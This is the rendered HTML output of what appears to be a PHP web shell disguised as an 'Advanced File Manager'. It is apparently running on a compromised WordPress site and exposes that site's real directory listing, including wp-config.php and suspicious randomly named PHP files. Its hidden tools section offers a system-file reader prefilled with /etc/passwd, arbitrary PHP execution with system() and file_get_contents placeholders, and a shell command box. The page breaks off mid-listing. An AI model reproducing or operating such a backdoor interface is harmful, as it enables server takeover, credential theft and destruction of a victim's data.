<!DOCTYPE html>
<html>
<head>
    <title>File Manager</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }
        .container { max-width: 1400px; margin: auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }
        .toolbar { background: #f0f0f0; padding: 10px; margin: 10px 0; border-radius: 5px; }
        .section { margin: 15px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; background: #fafafa; }
        .file-table { width: 100%; border-collapse: collapse; margin-top: 10px; }
        .file-table tr:hover { background: #f9f9f9; }
        .file-table td, .file-table th { padding: 8px; border-bottom: 1px solid #eee; text-align: left; }
        .dir-link { color: #0066cc; font-weight: bold; text-decoration: none; }
        .dir-link:hover { text-decoration: underline; }
        .actions form { display: inline; margin: 0 2px; }
        .actions input, .actions button { font-size: 12px; padding: 2px 5px; }
        .breadcrumb { margin: 10px 0; padding: 8px; background: #e8f4f8; border-radius: 4px; }
        button, input[type="submit"] { background: #4CAF50; color: white; border: none; padding: 5px 10px; border-radius: 3px; cursor: pointer; }
        button:hover, input[type="submit"]:hover { background: #45a049; }
        .delete-btn { color: red; }
        textarea { font-family: monospace; }
    </style>
</head>
<body>
<div class="container">
    <h2>📁 Advanced File Manager</h2>
    
    <!-- Current Directory Display -->
    <div class="toolbar">
        <strong>📍 Current Path:</strong> 
        <a href='?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html'>🏠 Home</a> / <a href='?dir=%2Fhome'>home</a> / <a href='?dir=%2Fhome%2Fvinhkhach01'>vinhkhach01</a> / <a href='?dir=%2Fhome%2Fvinhkhach01%2Fdomains'>domains</a> / <a href='?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn'>bietthunamcuong.com.vn</a> / <strong>public_html</strong>    </div>
    
    <!-- Quick Access Buttons -->
    <div class="section" style="background:#e8f5e9">
        <strong>⚡ Quick Access:</strong>
        <a href="?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">🏠 Root</a> |
        <a href="?dir=/">💻 System Root</a> |
        <a href="?dir=/var/www/html">🌐 Web Root</a> |
        <a href="?dir=/etc">⚙️ /etc</a> |
        <a href="?dir=/home">👤 /home</a> |
        <a href="?dir=/tmp">📦 /tmp</a>
    </div>
    
    <!-- Upload Form -->
    <div class="section">
        <form method="POST" enctype="multipart/form-data">
            <strong>📤 Upload File:</strong>
            <input type="file" name="file" required>
            <input type="submit" value="Upload to Current Directory">
        </form>
    </div>
    
    <!-- Create Form -->
    <div class="section">
        <form method="POST">
            <strong>➕ Create New:</strong>
            <input type="text" name="new_name" placeholder="name" required size="30">
            <select name="item_type">
                <option value="file">📄 File</option>
                <option value="dir">📁 Directory</option>
            </select>
            <input type="submit" name="create_item" value="Create">
        </form>
    </div>
    
    <!-- System Tools -->
    <div class="section" style="background:#fff3e0">
        <details>
            <summary><strong>🔧 Advanced Tools (Click to Expand)</strong></summary>
            <br>
            
            <!-- System File Reader -->
            <form method="POST" style="margin-bottom:15px">
                <strong>📖 Read System File:</strong>
                <input type="text" name="system_file" value="/etc/passwd" size="50">
                <input type="submit" name="read_system" value="Read File">
            </form>
            
            <!-- PHP Code Execution -->
            <form method="POST" style="margin-bottom:15px">
                <strong>🐘 Execute PHP Code:</strong><br>
                <textarea name="execute_code" rows="3" cols="80" placeholder='echo system("whoami");&#10;echo file_get_contents("/etc/passwd");&#10;phpinfo();'></textarea><br>
                <input type="submit" value="Run PHP Code">
            </form>
            
            <!-- System Command -->
            <form method="POST">
                <strong>💻 System Command:</strong>
                <input type="text" name="system_cmd" size="60" placeholder="ls -la, whoami, id, pwd, uname -a">
                <input type="submit" value="Execute Command">
            </form>
        </details>
    </div>
    
    <!-- File Listing -->
    <h3>📂 Directory Contents:</h3>
    <table class="file-table">
        <thead>
            <tr>
                <th>Type</th><th>Name</th><th>Permissions</th><th>Size</th><th colspan="5">Actions</th>
            </tr>
        </thead>
        <tbody>
                    <tr>
                <td>📄</td>
                <td>
                                            .htaccess                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.12 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.htaccess&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.htaccess">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.htaccess&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/.htaccess">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.htaccess&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete .htaccess permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/.htaccess">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.tmb" class="dir-link">.tmb</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0777</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/.tmb">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F.tmb&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete .tmb permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/.tmb">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            0x.txt                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.01 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F0x.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F0x.txt">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F0x.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/0x.txt">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F0x.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete 0x.txt permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/0x.txt">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            1wCAo4EXq4.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0666</td>
                <td style="font-size:12px">14.48 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F1wCAo4EXq4.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F1wCAo4EXq4.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F1wCAo4EXq4.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/1wCAo4EXq4.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2F1wCAo4EXq4.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete 1wCAo4EXq4.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/1wCAo4EXq4.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            dwrytxxy.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">89.83 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fdwrytxxy.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fdwrytxxy.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fdwrytxxy.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/dwrytxxy.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fdwrytxxy.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete dwrytxxy.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/dwrytxxy.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            index.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.4 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Findex.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Findex.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Findex.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/index.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Findex.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete index.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/index.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            license.txt                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">19.44 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Flicense.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Flicense.txt">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Flicense.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/license.txt">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Flicense.txt&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete license.txt permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/license.txt">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            php.ini                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.1 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fphp.ini&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fphp.ini">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fphp.ini&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/php.ini">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fphp.ini&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete php.ini permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/php.ini">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            readme.html                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">7.25 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Freadme.html&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Freadme.html">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Freadme.html&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/readme.html">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Freadme.html&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete readme.html permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/readme.html">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-activate.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">7.18 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-activate.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-activate.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-activate.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-activate.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-activate.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-activate.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-activate.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-admin" class="dir-link">wp-admin</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-admin">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-admin&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-admin permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-admin">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-blog-header.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.34 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-blog-header.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-blog-header.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-blog-header.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-blog-header.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-blog-header.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-blog-header.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-blog-header.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-comments-post.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">2.27 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-comments-post.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-comments-post.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-comments-post.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-comments-post.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-comments-post.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-comments-post.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-comments-post.php">
                        <input type="hidden" name="dir" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-config.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.61 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-config.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-config.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html%2Fwp-config.php&dir=%2Fhome%2Fvinhkhach01%2Fdomains%2Fbietthunamcuong.com.vn%2Fpublic_html">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/vinhkhach01/domains/bietthunamcuong.com.vn/public_html/wp-config.php">
